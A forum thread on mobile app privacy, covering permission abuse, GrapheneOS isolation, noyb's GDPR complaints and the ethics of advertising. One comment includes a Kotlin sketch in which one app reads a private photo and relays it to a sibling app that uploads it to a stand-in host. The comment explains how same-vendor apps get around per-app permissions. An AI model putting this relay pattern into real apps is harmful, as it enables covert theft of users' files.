The worst I've had is a clock/weather widget that seemed to give you a choice of ads/no-ads, but if no-ads was chosen, it would make your phone part of a network of proxies (Oxylabs) without telling you, in addition to transmitting location info (which it did tell you about). There was no payment option to get rid of the ads/data selling. The only way I found out was by looking at the requests it made using NetGuard.
Similarly, the default clock that came with my Xiaomi phone wanted permission to access my contacts before it would let me set an alarm. It did not get any such permission; I run an alternative clock/alarm app instead, and this will be the last Xiaomi phone I buy.
TBH that just sounds like bad design. The manufacturer could easily have granted that permission out of the box and you'd be none the wiser. A lot of built-in apps have permissions that can't be viewed by the user.
The design worked for me! It highlighted a problem that I might want to be aware of when picking my next phone.
No, I don't want Google or whoever else to have their alarm app scanning my contacts for no good reason¹ either, and perhaps I can't stop whoever is doing it, but given how many apps are locked onto that phone, how often it finds a reason to start one of them up, what permissions they want, etc., I'm pretty sure I trust Xiaomi less. They probably have all my current data already anyway (I'm sure this phone is using more data than the previous one, though I've not dug into why yet; perhaps sending my info home is why), but hey ho…
My last phone was from Xiaomi too, but that was relatively stock Android (on the Android One program), so it didn't have so much extra junk forced into it.
--
[1] They might have a reason; I doubt I'd consider it good!
Google apps generally have all permissions. GrapheneOS actually offers a sandboxed version of them that works like normal apps, so you can see how many permissions they request.
The link doesn't explain why a built-in app would ask for permission to do anything. E.g., as the sibling comment mentioned, Google apps often have full permissions by default and don't need to ask.
I couldn't possibly link to all the copious evidence online (anecdotes on this forum, high-stakes data breaches) that personal data is being harvested by default en masse. It's true about the link; it was meant as a nod to at least some scientific endeavour to investigate sharing.
> doesn't explain why a built-in app would ask for permission to do anything
> that personal data is being harvested by default en masse
You seem to be agreeing, at least on the point that a built-in app is usually granted permissions without requesting them from the user. I think it would be more correct to say "bad implementation" instead of "bad design", but the point seems to make sense.
But ultimately it seems that you and OP both agree that this "bad implementation" (asking the user for permission instead of being granted it by the OS) is the intended design (requiring an unrelated permission for basic functionality).
> the default clock that came with my Xiaomi phone wanted permission to access my contacts
Unfortunately not surprising at all for Xiaomi, or any Chinese smartphone maker for that matter. Not that Korean or American Android phone makers like Samsung, Motorola, Google (Pixel) etc. are privacy friendly, but Chinese smartphones are way worse.
I have to suspect they thought whoever was gullible enough to pay $3-6 a month for an alarm app would surely not care about their data going along with it.
Some of us think that if app developers who deliver good apps earn money from it, it will incentivize them to continue creating good apps.
But sometimes I feel myself slipping closer and closer to your much more cynical ideas.
In particular I remember donating what was for me a good chunk of money to Caddy right before they started "experimenting with business models" or whatever he called it. Same goes for happily paying for WhatsApp, walking around like a living, talking billboard for it, only to have them sell out to Facebook shortly after.
"Greed is good" --Says the monkey with his hand trapped in a jar.
History has taught us that an enforced rule of law is the only way to prevent scammers from being the dominant players (by number, not size) in a market.
Negative. It ceases to be adaptive to be a cheater when cheaters exceed a certain percentage of the population. The advantage comes from information asymmetry.
Law makes cheating less adaptive. But even without law, cheats would not exceed some small minority.
The entire demographic in the data is willing to pay $3-6 a month for an alarm app. I'd sell the data too, they're probably hitting printer ink levels of valuation for it.
There is an alarm clock app on iOS that used to be a one-time purchase of 4 USD or so and is now a monthly fee, which I still use every day. It records your sleep sounds and wakes you up at a time when you're not in a deep sleep (you set an n-minute wakeup window).
They added ChatGPT and all sorts of other shit to it unfortunately but the core functionality is still good
You can't even buy your way out of it like people suggest. The fact that you want to do that signals you have money and makes your data even more valuable. Even companies that do not do this currently, assuming they are publicly traded, will eventually succumb. They just need a bad quarter, or a few people needing to boost their metrics, and they'll add the new revenue source.
I am really glad the era of the infuriating, endlessly parroted line "If you're not paying for it, you're the product" is coming to an end.
People try to justify everything they do, and this is one of the worst examples. Some even seemed to use this as an argument against open source, which is usually free.
Along the same lines there is "What is your monetization plan?".
The next one I wish would go away is the "but they have a privacy policy" line of thinking. Like that means anything.
It's actually a bit trickier than I am about to present it, but: is it possible that you did not suspect that an "alarm clock" should need no Internet permissions?
I noticed that on my Samsung phone the Clock app has "QUERY_ALL_PACKAGES". According to Google this is not a permitted use of QUERY_ALL_PACKAGES. F Google for not allowing user consent for this permission.
>Permitted uses involve apps that must discover any and all installed apps on the device, for awareness or interoperability purposes may have eligibility for the permission. Permitted uses include device search, antivirus apps, file managers, and browsers.
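To make concrete what that permission unlocks, here's a minimal Kotlin sketch (my own illustration, not Samsung's code): on Android 11+ this call normally returns a filtered subset of packages, but once QUERY_ALL_PACKAGES is declared in the manifest it returns everything, which is enough to fingerprint a user by their app list.
    import android.content.Context
    import android.content.pm.PackageManager

    // Sketch: enumerate installed apps. Without QUERY_ALL_PACKAGES, Android 11+
    // filters this list; with the permission declared in the manifest, the app
    // sees every package on the device.
    fun installedPackages(context: Context): List<String> =
        context.packageManager
            .getInstalledApplications(PackageManager.GET_META_DATA)
            .map { it.packageName }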
It's also bad for publishing (they use that term now too, anyway). I mean, really: ALL of those tech-savvy people store their data in plaintext on someone else's computer, not knowing what that thing does. There are many thousands of users on one instance, which can simply disappear; maybe the operators were ethical people who had no dirty money and couldn't exchange the information for currency to pay the hoster, I don't know. But you can get banned pretty quickly. Even when talking in private, a mod can decide it's creepy and ban you. They still have the data; you no longer have access to your audience.
They are actually toots. It's a "feature" that other people can read what you say in private to someone and ban you if it (the conversation) is creepy. Said feature is active on all instances and is not opt-out. No instance has an in-house fix (I think they would post about it if they did, since people like to talk in private). I mean, almost every human on earth uses e2ee, but Mastodon is such a clusterfuck (honestly? The devs are drunk, or something really fishy is going on there. They got funding and built a client, which is exactly what was NOT needed, or usable, or their thing). It's too complicated, they say. I know; ping me if you have the same thought, it's easy to fix!
For most people, YES: it is pretty hard to grab DMs from Twitter's servers, especially compared to reading them in plaintext like on Mastodon. You think Meta is no good, but it's still e2ee, so you're better off writing there.
Long story short: There is nothing that actually prevents an installed app from collecting all your data.
Progressive Web Apps, on the other hand, are actively restricted by the browser sandbox and are generally a preferred solution from a privacy perspective.
GrapheneOS allows disabling network for a particular app, alongside the other permission settings. As a rule, I’ll give an app either file permissions or network permissions, but almost never both.
A lot of apps are perfectly usable without file access by sharing a file to them from the file manager.
GrapheneOS also has “Contact Scopes”: you can grant an app contacts access (or so it thinks) while it actually sees only a subset, or an empty list, of contacts.
Another feature that’s commonly recommended is using multiple profiles. I often see people use this to run Google apps in an environment isolated from the rest of their data.
I used to use something like that too. Then a set of apps from a scummy telephony provider in my country showed me evidence of how they circumvent this.
Turned out, all apps from this vendor talked to each other, in the background. If one app has filesystem access but no network access, and another has network but no filesystem access, the former can upload private filesystem data by sending it through the latter.
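To sketch the mechanism (the package names, broadcast action and URL are all made up for illustration; this is one of several possible channels, alongside ContentProviders or a sharedUserId):
    import android.content.BroadcastReceiver
    import android.content.Context
    import android.content.Intent
    import java.io.File
    import java.net.HttpURLConnection
    import java.net.URL
    import kotlin.concurrent.thread

    // App A: storage permission, no INTERNET permission.
    // Reads a private file and hands the bytes to a sibling app via broadcast.
    // (Real apps would chunk large payloads; binder caps extras around 1 MB.)
    fun exfiltrate(context: Context) {
        val intent = Intent("com.vendor.sync.UPLOAD").apply {
            setPackage("com.vendor.appB") // explicit target: the sibling app
            putExtra("payload", File("/sdcard/DCIM/photo.jpg").readBytes())
        }
        context.sendBroadcast(intent)
    }

    // App B: INTERNET permission, no storage permission.
    // Its exported receiver uploads whatever it is handed.
    class RelayReceiver : BroadcastReceiver() {
        override fun onReceive(context: Context, intent: Intent) {
            val payload = intent.getByteArrayExtra("payload") ?: return
            thread { // network is not allowed on the main thread
                val conn = URL("https://collect.vendor.example/u")
                    .openConnection() as HttpURLConnection
                conn.requestMethod = "POST"
                conn.doOutput = true
                conn.outputStream.use { it.write(payload) }
                conn.inputStream.close()
            }
        }
    }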
How do apps utilize the permissions of other apps? How does the filesystem app communicate with the network app if it does not have network privileges and the other app has no filesystem privileges (i.e. there is no shared channel)?
Initial suspicion: Apps I had explicitly killed (equivalent to Force Stop) would start running. Most of these apps had no background services (or any reason to run in the background) and no notifications to show either. But they did have one thing in common: the vendor.
Further suspicion: Apps remain killed, for long periods of time, if I don't start any of them.
Quick test: Kill all apps. Start them one by one. Check if other apps are now running.
Confirmation: Pull the APKs from the device; reverse-engineer their code for IPC.
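FWIW, the IPC surface that last step uncovers can often be spotted without full reverse engineering, just by listing a package's exported components. A rough Kotlin sketch (the package name is a placeholder; on Android 11+ you'd also need package visibility, e.g. a <queries> manifest entry, for this to see another app):
    import android.content.Context
    import android.content.pm.ComponentInfo
    import android.content.pm.PackageManager

    // Sketch: list the exported components of a package, i.e. the IPC
    // endpoints that other apps (like a same-vendor sibling) can reach.
    fun dumpIpcSurface(context: Context, pkg: String = "com.vendor.appB") {
        val flags = PackageManager.GET_RECEIVERS or
                PackageManager.GET_SERVICES or
                PackageManager.GET_PROVIDERS
        val info = context.packageManager.getPackageInfo(pkg, flags)
        val components: List<ComponentInfo> =
            info.receivers.orEmpty().toList() +
            info.services.orEmpty().toList() +
            info.providers.orEmpty().toList()
        components.filter { it.exported }
            .forEach { println("exported: ${it.name}") }
    }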
You’ve given me something to think about. Luckily, I only have to amend my mental model a bit, to assume giving a permission to any vendor’s app is to give that permission to every app from that vendor. In most cases where that would be a problem, I already run such apps under a separate user profile, which fully prevents IPC.
> GrapheneOS allows disabling network for a particular app, alongside the other permission settings.
This feature is also useful in LineageOS, as a kind of native firewall. Thankfully most open source apps on my device don't use network connectivity so the permission is greyed out to begin with.
Sorry, I just checked the "Advanced Privacy" settings, but I see nothing about restricting network access for a particular app. I'd be very interested in that feature though - do you have more pointers how exactly to restrict a single app?
My DivestOS features both the GrapheneOS and LineageOS implementations, and I document the former as a block and the latter as a "data restriction" (e.g. to simply block over cellular), as the latter cannot guarantee a real block.
I recommend using a separate profile for apps you may want that require Google Services. GrapheneOS is perfect for this.
My separate profile is called "Burner" which serves as a handy reminder to me that I may, at some point, wipe out the whole profile and every app therein.
That would be nice. Android has a wealth of phones with features, but the Pixel line is missing some I would consider “required”, not to mention they aren't available in my country.
On Graphene, if you deny network access to the sandboxed Play Services, it cannot transmit data to Google. But does Play Services cache all that privacy-invasive data, so that if you switch on network access at some point in the future, Play Services will upload it as soon as it gets a chance? If so, seems like a failure of GrapheneOS's model.
Yes, if the worry is that an app could offload data via the network, then turning off the network only provides a privacy benefit if the network stays off. That’s why the recommendation is to run Google apps in an isolated user profile, so they have no opportunity to collect data in the first place.
But even under an isolated profile, wouldn’t Play Services still have access to your IMEI, phone number, location and sensor data? That would seem to completely deanonymize the user regardless, if not to the app developer then at least to Google.
According to the GrapheneOS FAQ: “As of Android 10, apps cannot obtain permission to access non-resettable hardware identifiers such as the serial number, MAC addresses, IMEIs/MEIDs, SIM card serial numbers and subscriber IDs.”
> phone number
I don’t think it has access to this.
> location
You can turn off location permissions. Spoofing location (so the app doesn’t know it has no permission) is a planned feature but with no ETA.
> sensor data
You can turn off sensor permissions alongside other app permissions. This is another toggle present in GrapheneOS but not stock Android.
As much as I'd love to run GrapheneOS—and in the context of the original post—I just can't bring myself to willingly give the Google ad-machine my money. I keep hoping another manufacturer will step up and drive support for their devices.
Users cannot change the system WebView; Android only allows pre-included ones, as it gets loaded directly into the process space of every app using the WebView widget.
And it still makes many connections to Google and includes proprietary Google binaries and downloads more at runtime: https://divestos.org/misc/e.txt
Thanks, I should take a look. I've also been meaning to try DivestOS.
I'm certainly not holding my breath on more GrapheneOS support, as so few people care. I'm not entirely sure it'd be the right fit for me anyway. I'm currently using a microg setup with lsposed so I can patch out some junk in modern apps (like Outlook trying to be device admin), and this kind of hooking is not something GrapheneOS is interested in (a feature request I opened a while back: https://github.com/GrapheneOS/os-issue-tracker/issues/284).
Except the only difference is that PWAs in Chrome's "sandbox" just collect data for Google, and Google alone. Do you believe they do it for the greater good?
Google probably gets data both within the sandbox and outside the sandbox. But outside the sandbox, probably so do parties with worse privacy practices than Google, such as actually selling your data instead of just letting their internal ad systems use your data so that advertisers can reach you with targeted ads, or such as not letting you delete your data as effectively as Google does.
(Disclosure: I have worked for Google in the past, but not for over 8 years, and I’m certainly not speaking for them here. My Google job never included anything relevant to this comment, except doing roughly 1-2 years of standard SRE/devops/sysadmin work for a now-decommissioned acquired product in the publisher-side display ads yield management space, ending roughly a decade ago.)
> just letting their internal ad systems use your data so that advertisers can reach you with targeted ads
Your distancing yourself from your former employer's practices is appreciated, but from an antitrust PoV, Google monopolizing click and all other web-usage data by keeping it for itself (as opposed to selling the data under FRAND terms) isn't any better.
There's no way around taking Chrome development and monopoly influence on web standardization away from Google as one outcome of ongoing antitrust lawsuits.
> Your distancing yourself from your former employer's practices is appreciated, but from an antitrust PoV, Google monopolizing click and all other web-usage data by keeping it for itself (as opposed to selling the data under FRAND terms) isn't any better.
I’m comparing practices from the perspective of privacy, not antitrust, since that is the frame in which we were discussing, and with which the original submitted NOYB article was concerned.
I don’t like monopoly power in the advertising industry any more than you do, and Google is not an exception to that. But I don’t want the fix to any Google advertising monopoly to be forcing them to share user data on FRAND terms. Not only would that likely violate privacy law in Europe and elsewhere in the world, it would reduce my data’s privacy protections to what results from the worst privacy practices among anyone who buys the data from Google. Yes, that’s far worse than what Google currently does.
> There's no way around taking Chrome development and monopoly influence on web standardization away from Google as one outcome of ongoing antitrust lawsuits.
If authorities like those in Europe or the US decide that antitrust violations by Google warrant those remedies, I have no personal objection. But I would object to any anti-monopoly measures that effectively destroy the privacy of the profile Google has built on me, such as mandatory FRAND licensing of that data. At least I can delete the data when there's just the one data custodian, and one which properly implements and tests its data deletion processes more than many companies do.
This is why I don't use default Chrome or stock Android. They're both products from a known privacy invader.
But even if you do, these are restricted from wholesale collection of data like your contacts by marketplace and public relations pressures and concerns that smaller junk app vendors don't have.
e/OS and Brave browser. I generally avoid Google's Play store and install most apps from Aurora and F-Droid. Aurora provides a privacy report that you can review before installing an app.
> There is nothing that actually prevents an installed app from collecting all your data.
Uhm, false? Unless "all your data" refers to "what you do in the app" + IP address + phone model, nothing else is accessible by default on the iPhone. All that info is also available to any website you visit, so PWAs are not special in this regard.
The easiest way for a bad actor to get access to personal data on iPhone or Android is to simply ask for it --- create a junk installed app with some quasi-plausible excuse for requesting it. There is no restriction on what can be done with the data once the request is granted.
Granting a random app access to all your private data after they request access is very different than "There is nothing that actually prevents an installed app from collecting all your data."
I think the only sensitive APIs not available in the browser are calendar and photo gallery access; PWAs otherwise have access to Contacts, GeoLocation, Cameras, Microphone, Clipboard, and even the FileSystem.
Maybe Android apps do suffer from the problem you’re describing, since permissions are granted lumped together at install time, but on iOS all permissions are optional just like in the browser.
The only reason stuff like PiHole / AdGuard DNS and many others work is because the service vendors have not bothered unifying ALL the network requests their service needs under a single domain. The one and only reason we can use those privacy-enhancing solutions is because the vendors are sloppy.
The moment your favorite app starts using only the `your-fav-app.com` domain for everything, ads and sending out your private info included, you are toast, and you'll need a MITM proxy or some other on-device network-payload inspector (after decryption has taken place) to save yourself. (So maybe AdGuard's client app, I presume? But I haven't ever tried it.)
Maybe Privaxy[0] will help -- I haven't tried it yet, and sadly I have no time and energy for it at the moment. But DNS-level blocking in particular is just waiting for a few more resourceful vendors to do the right thing for their own interests, and then we're disarmed.
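To illustrate why first-party hosting defeats hostname-level blockers, here's a toy Kotlin sketch (the hostnames are made up): a DNS blocklist can only match whole hosts, so an ad endpoint sharing the app's own API host can't be blocked without breaking the app.
    import java.net.URI

    // Toy model of a DNS-level blocker: it can only match whole hostnames.
    val blocklist = setOf("ads.tracker.example", "telemetry.vendor.example")

    fun isBlocked(url: String): Boolean = URI(url).host in blocklist

    fun main() {
        // Third-party ad host: blockable.
        println(isBlocked("https://ads.tracker.example/banner"))       // true
        // Same payload served from the app's own domain: blocking this
        // host would break the app itself.
        println(isBlocked("https://your-fav-app.com/api/ads/banner"))  // false
    }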
Your data can easily be sent to an IP collection point that is not on AdGuard's list. DNS blockers are better than nothing --- which is a pretty low bar and easy to jump over.
That research was conducted on the 2018 version of the OS, and also at a time when Google Play's distribution agreement was much more relaxed (close to zero app checks).
As far as I know, most (if not all) of the concerns shared have been addressed in the following 2 years, so I would assume that this is not an issue anymore in 2023 - or at least not as severe. I believe that new loopholes exist, but this one seems outdated to me.
The data described in that article (Eg MAC Address) has virtually zero overlap with the kind of data GP mentioned (contact list, gallery). Most people only care about the latter.
btw "The researchers discovered that the Shutterfly app was accessing the location tags of photos' EXIF metadata. All that's required is the READ_EXTERNAL_STORAGE permission" sounds ridiculous. If you grant permission to read entire files, of course the app can read metadata.
> These complaints are just the beginning: noyb is planning to file more complaints against mobile app companies in the future in order to stop the illegal sharing of user data.
Gotta love what noyb is doing. In case you want to support their work, there are links on their website to donate or to become a member. I'm not affiliated with them in any way, but their approach to privacy law enforcement is precisely what we need right now. Companies that misuse personal data (often in violation of European law) must know that there can be consequences (reputational, financial and potentially legal).
It's good work. Ultimately though, we cannot base civic cybersecurity for the entire population on groups like NOYB or any number of vigilante policemen exposing malevolent companies one by one. It's neither scalable nor sustainable against a tide of technological abuse enabled by a culture of corporate entitlement and public apathy.
In addition to legislation, the problem requires active programmes of public education and information, as is the case for all other public health or security issues. More lives are saved per dollar running a "Don't drink-drive" campaign than giving police money to arrest drunk drivers.
"Don't install that app" should be a tag-line every mother and child knows, like "See it. Say it. Sorted.", just to get people to pause and think... "Would I share all my personal data and access to my life with a random total stranger?" Because that's what you're doing when you install some dodgy app at a restaurant.
Maybe groups like NOYB could do more work on sophisticated, modern, influential media to attack the root cause of the problem: a fundamentally flawed security model with a set of wholly inappropriate assumptions.
Doctors and lawyers, and possibly other professions, have to take courses in ethics, and can then lose their license to practice for ethical violations. We should impose the same for software. Each company that produces software for public use should be issued a license to operate. If the company is found guilty of violating the ethics of that license, it loses the license. That means its software is no longer legal to sell.
That is a wild overreaction! If there's a legal consensus nobody is going to violate that. Even the huge companies that get vilified on here spend millions trying to comply with all the various jurisdictions' rules. Different parts of the EU can't even agree on how to interpret their own laws yet.
Licensure tends to be a protective mechanism to keep salaries high. If that's your goal, great, but it's a weird hammer to apply to fix your subjective opinion of what's ethical.
>If there's a legal consensus nobody is going to violate that.
Talk about wild speculation! Shall we have a look at all of the laws, and the companies that break them, that have only received slap-on-the-wrist fines? Clearly there are some sort of regulations, otherwise how would these fines be imposed? And if there were no violations of those regulations, why are fines being imposed at all? So your "nobody is going to violate that" is already starting the conversation on shaky ground.
This is analogous to solving murder by telling everyone to stay home since serial killers run free on the street instead of catching & jailing murderers.
Maybe we could enforce the (existing!) laws against malware, fraud, spam, etc so that people can continue to install apps & use them and be confident knowing that nothing bad will happen, and if it does happen then the offenders will be punished appropriately?
GDPR breaches aren't limited to apps, btw; they happen on websites and even in real life (Tesco stores in the UK, for example, have a notice inside the store about data collection; presumably they're doing Bluetooth/Wi-Fi MAC address tracking. By the time you read the notice you're already being stalked, and there's no way to opt out other than inconveniencing yourself by manually toggling the relevant radios before going to the store).
> analogous to solving murder by telling everyone to stay home since serial killers run free on the street.
You're advocating an extreme measure (locking yourself at home) in response to a practically non-existent threat ("serial killers" do not roam the streets looking for random victims except in Hollywood plots). OTOH the chance of an average person being scammed by corporate data thieves seems less than one in ten, as a total guess. So surely you see you're making a disingenuous analogy.
Education is a very powerful weapon against the criminality of Surveillance Capitalism. And it's flexible; people can choose a range of responses, from pausing before installing a new app, to getting rid of their smartphone and choosing a better lifestyle.
I meant this in a hypothetical world where we'd "solve" murder by letting murderers walk free and telling people to hide at home (your proposed approach to solving GDPR breaches) instead of applying the law and jailing them.
Informing people only helps if they have a choice whether or not to use the app/service.
In many cases, people are tracked by services they cannot really avoid. One example is the German "Deutsche Bahn" app, which is full of trackers. Some organizations are now trying to fight this using legal means. Another example was the Covid vaccine registration page in my canton in Switzerland, where Google Analytics was being used (right on the page with my sensitive medical information). It wasn't even being mentioned in the privacy policy.
We have laws that say what's legal and what's illegal. If something is illegal, those laws should be enforced. Especially when users have no choice.
> Informing people only helps if they have a choice whether or not to use the app/service.
People always have a choice. Blinded by comfort, convenience and other "first world problems" they may not immediately recognise it as a choice, but by historical standards they absolutely always have one.
> No Consent. Under the ePrivacy Directive, the mere access or storage of data on the user’s terminal device is only allowed if users give their free, informed, specific and unambiguous consent. Two out of the three mobile apps did not display a consent banner when launching the app. The third app presented a banner that theoretically gave the complainant the choice of giving or withholding their consent. In reality, the transmission of their personal data began without any interaction on their part – and before they even had a chance to think about consent.
Why does nobody question the fact that it is possible for an application to access data without user consent to begin with? Why are we transforming it into a human problem? The tech is to blame.
Google is an advertising company and it's not in their interest.
It's absolutely technically viable to build an app store that incentivizes using the minimum amount of permissions possible, or to even feed fake data to overly nosy apps. In fact it's been done, but it'll be a cold day in hell before Google makes it easy.
Very few companies/programmers I know write 'secure first'. Most of the time it's "this shit isn't working, turn off the security stuff and see if it works then we'll re-enable it later"
What app developers want/do is irrelevant. I am saying that it should be impossible for any individual app to access or connect to anything without explicit user consent.
We need to stop automating everything and then complaining that companies aren't putting up optional banners everywhere. This is beyond stupid.
For what it's worth, the opinion isn't universal. As a user I like the Haiku approach of not even having "user accounts" and on Linux I have 'sudo nopasswd ALL' on. Coddling everyone and sandboxing everything without any options to get that stuff out of the way isn't acceptable to me. Security or even privacy aren't always my top priority, and I should have that freedom available to me, even if you want the option not to have it.
The reality is there are two operating systems for mobile devices for >99% of the population.
The reality is many applications developed for those devices try to harvest data from the user, often without their consent. Contact details, location data, correlation to other apps installed, and so on, in order to make money.
The reality is that this is unethical without explicit consent, and nothing will stop these actors except technical barriers to this malicious activity.
Your desire to sleep in your apartment with the windows open and doors unlocked and cameras off is yours, but if there is a binary decision of "have these protections or not", the answer is clear.
Personally I am not advocating for "protection". Protection against what? Your own device? Why is your device harming you to begin with?
The online data privacy crisis isn't really about data or the bad actors, but the lack of understandability and control over our own electronics.
To solve the problem you need to make users more involved: remove automation in favor of manual processes, simplified as much as possible. "Protections" are mostly a band-aid hiding the real cause.
Seatbelts don't need to be worn by good drivers, because they won't get into accidents!
>protection against ... your own device? Why is your device harming you to begin with?
Yes. Because some apps do more than they claim to do, and users are unaware, and thinking that all citizens can be perfectly informed and thus do not need to put guardrails on app permissions is foolish.
>but the lack of understandability and control over our own electronics.
The lack of control over the data that can be extracted by bad actors that seem like good actors.
>"Protections" are mostly band-aid hiding the real cause.
The real cause is that humans can be malicious, others can be fooled, and the first goes after the second.
> Seatbelts don't need to be worn by good drivers, because they won't get into accidents!
All humans are fallible, but another human's fallibility may be out of your control. There is no other human between you and your device.
> Yes. Because some apps do more than they claim to do, and users are unaware, and thinking that all citizens can be perfectly informed and thus do not need to put guardrails on app permissions is foolish.
Why do you even have to trust what apps say? That's my problem with this reasoning: we are under the assumption that programs control your device and that nothing can be done about it except adding warnings. Why do programs need instructions to access data? How about forcing the user to plug any environment access into the app? Anything that isn't plugged in cannot be accessed; no trust required.
> The lack of control over the data that can be extracted by bad actors that seem like good actors.
The solution is to give control over the data, not through protection, but through understanding. You are transforming this tech problem into a human problem.
> The real cause is that humans can be malicious, others can be fooled, and the first goes after the second.
Again, no human stands between you and your device/program. We have, however, decided that software can be malicious.
It is easier to build automation on top of a simpler/manual/secure process, than it is to make a fully automated system secure.
I am not saying that automation shouldn't be possible at all, but that platforms shouldn't be designed this way.
If users had to consent to contact access, socket connections, and every single packet sent (obviously these would need to become readable to a layman), there would be way less demand for data privacy laws.
That's understandable, and so perhaps we need to re-think our computing model to replace yes/no popups with something a bit more involving.
By "involving" I do not necessarily mean harder; the goal isn't to make computers less accessible. But if we give users the ability to control whatever goes in and out of their devices, maybe that means making them a bit more interactive: instead of clicking "yes" to allow keyboard access, you could drag a keyboard icon onto the app, or onto any other device you want to use as input.
Consent doesn't need to be presented as yes/no, there are multiple ways to make users understand what is being accessed.
There are, but anything that requires decisions (individual, separate decisions) every time will induce fatigue. Addressing that problem isn't going to happen by changing the UI presented at each individual interaction; it happens by finding a way to make the vast majority of those decisions ahead of time, by stating your personal default and then overriding it as necessary. A process that can be done once, or occasionally, and applied 100 times can be involved and still be worthwhile. Making it involved and repeated ad nauseam is a good way to ensure nobody will actually bother every time.
There is also a problem with how apps are made: they depend way too much on environment calls. And obviously adding 50 permission prompts isn't realistic.
Now, making the base process manual doesn't mean that the user will need to do the same thing over and over. I am not against automation, but I believe that it should come from the user, not from a fancy system that some external entity decided is the best way to handle permissions.
By outsourcing the responsibility for your data, you are effectively giving up on understanding it.
Ideally, I believe that consumer computers should become interactive/programmable systems where the OS is responsible for exposing all the environment calls and the apps are all stateless functions. The process of mapping environment access to an app is manual, but it creates consent AND customizability, plus additional benefits like easing the development of cross-platform applications and improving maintainability.
Of course the personal data needs to be transmitted prior to interaction! How else could we send the "consent-banner-displayed" event to Google Analytics to know if it's working?!
Ten years ago digital privacy advocates had a tough job. The fact that they still do today, is one of the most glaring governance failures of recent times.
Governments just can't seem to get their act together on this. It's pointless to revisit the spectrum of reasons, ranging from incompetence to complicity. If you want a populist framing, this is like knowingly lowering the gates of the castle and letting expert pickpockets rush in and have a field day with the unsuspecting citizens.
Maybe stressing that this inaction undermines the future of the digital economy and society would fly better with the political class. Digitization is our bright "future", no?
Economic actors will act according to the signals they get from government and its institutions as to what is allowed. If those signals are non-existent or mixed, they will invest in the "wrong" direction.
"Such extensive data collection allows the profiling of users in order to show them personalized ads and marketing campaigns to increase the revenue for the mentioned companies."
On a bit of a philosophical tangent: targeted ads increase revenues because they are focused on people with a higher probability of responding positively to the ads. If you assume agency of the user then this is a good thing, a win-win. But by treating this negatively you are assuming that the user has no agency over their actions. They reply to the ad, but it hurts them or they don't really want to, and we should protect users from this "temptation". This is the line of reasoning behind banning the sale of addictive substances to minors.
Note that I am not talking about privacy issues, only about the quoted reservation which is quite common.
Another philosophical tangent: we should protect humans from advertising on principle.
Our minds are sacred, our cognitive functions are inalienable. Not a single corporation on this planet is entitled to this. Our attention belongs to us. It's not currency to pay for services with. It's not a commodity for them to sell to the highest bidder. They don't get to insert their brands into our brains without our consent. That should be considered mind rape and any measures taken to stop it should be considered legitimate self-defense.
I’ve spent some time thinking about this. A lot of things in life can be avoided if you have more money. Waiting in long lines, having uncomfortable seats, doing regular chores, etc.
But it seems advertising can’t be completely avoided (as much as I’d like it to). I’ll go out of my way to spend money wherever it removes ads (eg YouTube, podcasts, etc), but no amount of money will remove the billboards I have to drive by on the way to work. I’ll never be able to go to a sports event without advertisers bidding for my attention.
You would think at least some of those issues could be avoided by living somewhere “more expensive”, but it seems like affluent areas actually have more ads.
What measures can we possibly take?
Nb: I recently took a trip to the USA and was appalled that they play full volume video advertisements while you’re filling up with gas. At least that’s not a practice that’s caught on elsewhere.
The number one example is of course uBlock Origin. It shows people a better world with no strings attached. So good it should be built into browsers. It can't block ads in videos... Yet. How long until someone makes an AI video filterer that deletes ads from video streams though? Have the AI watch ads so we don't have to. Given this technology, how long until augmented reality glasses with adblocking builtin start showing up?
> You would think at least some of those issues could be avoided by living somewhere “more expensive”, but it seems like affluent areas actually have more ads.
For whatever reason there are no (or very few) billboards in Northern Virginia, so that's one option. I wish there were more places like that, it's so refreshing driving through and not being bombarded with ads fighting for my attention (which is supposed to be on the road...).
But in general I think you're right, it's extremely hard to get away from. I think the main reason it's hard to "buy out" of advertising is that the very fact that you can afford to "buy out" makes you that much more valuable to advertisers.
> Nb: I recently took a trip to the USA and was appalled that they play full volume video advertisements while you’re filling up with gas. At least that’s not a practice that’s caught on elsewhere.
In case you visit again or it comes up for others, you should be able to push the second button from the top on the left to mute the video.
> no amount of money will remove the billboards I have to drive by on the way to work. I’ll never be able to go to a sports event without advertisers bidding for my attention
I don't want to be too pedantic, but it's worth noting that having a substantial amount of money can indeed resolve this issue.
For instance, being chauffeured means you don't have to pay any attention to the road unless you choose to do so.
Moreover, ad-free services like NFL RedZone are available; or, to your point about attending a sporting event, with sufficient wealth a private box can insulate you from 99% of sports event advertising.
> Nb: I recently took a trip to the USA and was appalled that they play full volume video advertisements while you’re filling up with gas. At least that’s not a practice that’s caught on elsewhere.
On most of these pumps you can push the second to top button on the right side of the screen to mute the ad.
According to the guy that owns the gas station down the street from me, this gets tracked and if the owner/advertisers see that enough people are muting the ads and they're not profitable, they'll stop paying to have them play at the pumps.
> it seems like affluent areas actually have more ads
Are you talking about cities? Most affluent people in the US live in quiet suburbs
> I recently took a trip to the USA and was appalled that they play full volume video advertisements while you’re filling up with gas
I've lived in the US for most of my life and I've never seen anything like that. You gotta specify what part of the US you're talking about because that's a very weird thing for you to assume is common
"They don't get to insert their brands into our brains without our consent."
You consent by going to free YouTube.
Big ads in cities are more difficult to avoid, but then again, someone wearing the sports shirt of his favourite soccer club is doing advertising. Someone wearing a cross for his religion, etc.
I don't think drawing an arbitrary line and saying "this is mind rape" and "this is legit" really works.
That being said, I do want to paintball big ads and the like.
> Big ads in cities are more difficult to avoid, but then again, someone wearing the sports shirt of his favourite soccer club is doing advertising. Someone wearing a cross for his religion, etc.
Yeah, but those give more room for consent than something like a youtube ad.
You passively see those advertisements while doing something else. When you see a television or youtube ad, your full attention is much more likely on the computer and on that ad.
Tell that to the people who need to watch a YouTube video and don't want to punch in their credit-card info. Unless someone is picking up the hosting and delivery costs, advertising will always make the most sense.
Now, don't get me wrong; ad-free YouTube at no cost would be great! It's not a business though, and without advertising arguably none of those services would exist. I don't know what you are proposing if not completely tearing-down our relatively accessible status-quo.
I would completely tear down the ad-driven status quo in favour of people paying for things. People shouldn't have to punch in their credit card info to access a youtube video and they shouldn't need to sign up for a subscription to youtube or any other site in order to access individual pieces of information. Payment should be only for content consumed and should be frictionless and consistent across all providers.
It's a pipe dream now, with the exploitative business models and consumer addictions well established, but there's an alternative history of the internet where this could have happened.
I'd view extreme poverty as a problem for the state rather than advertisers, universal basic income (UBI) being one obvious approach, and access to information for those too poor to pay for it as a challenge that has been long addressed by public libraries. Solving these problems is neither an explicit goal of adverts nor something they achieve well as a side effect.
